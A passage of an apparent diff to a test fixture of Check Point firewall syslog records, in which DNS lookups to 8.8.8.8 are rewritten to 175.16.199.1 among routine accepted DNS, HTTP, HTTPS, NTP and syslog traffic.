proto:"17"; s_port:"61209"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] +<134>1 2020-03-29T17:28:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dad4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"61209"; 
service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T17:28:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dad4,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"62820"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10075"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T17:28:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dad6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"63741"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T17:28:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dad6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; 
sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50136"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10076"; xlatesrc:"0.0.0.0"] 
@@ -2935,75 +2935,75 @@ <134>1 2020-03-29T17:30:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80db39,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50655"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T17:30:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80db39,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50656"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T17:30:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db44,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.1"; log_delay:"1585503044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48428"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db5d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54659"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db5d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503069"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42474"; service:"53"; service_id:"domain-udp"; 
src:"192.168.2.2"] +<134>1 2020-03-29T17:31:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db5d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54659"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db5d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503069"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42474"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:31:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db5d,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"188.40.137.18"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"49906"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:31:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80db5f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T17:31:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db76,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52854"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db76,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54553"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db76,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39714"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db76,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49455"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db76,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52854"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db76,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54553"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db76,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39714"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db76,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49455"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:31:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db76,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.30"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44762"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db76,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33948"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db76,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33948"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:31:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db76,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.16"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53122"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db76,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57444"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50761"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db76,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57444"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50761"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"88.221.161.146"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43124"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x2,0x353707c7,0xee78a1dc}"; 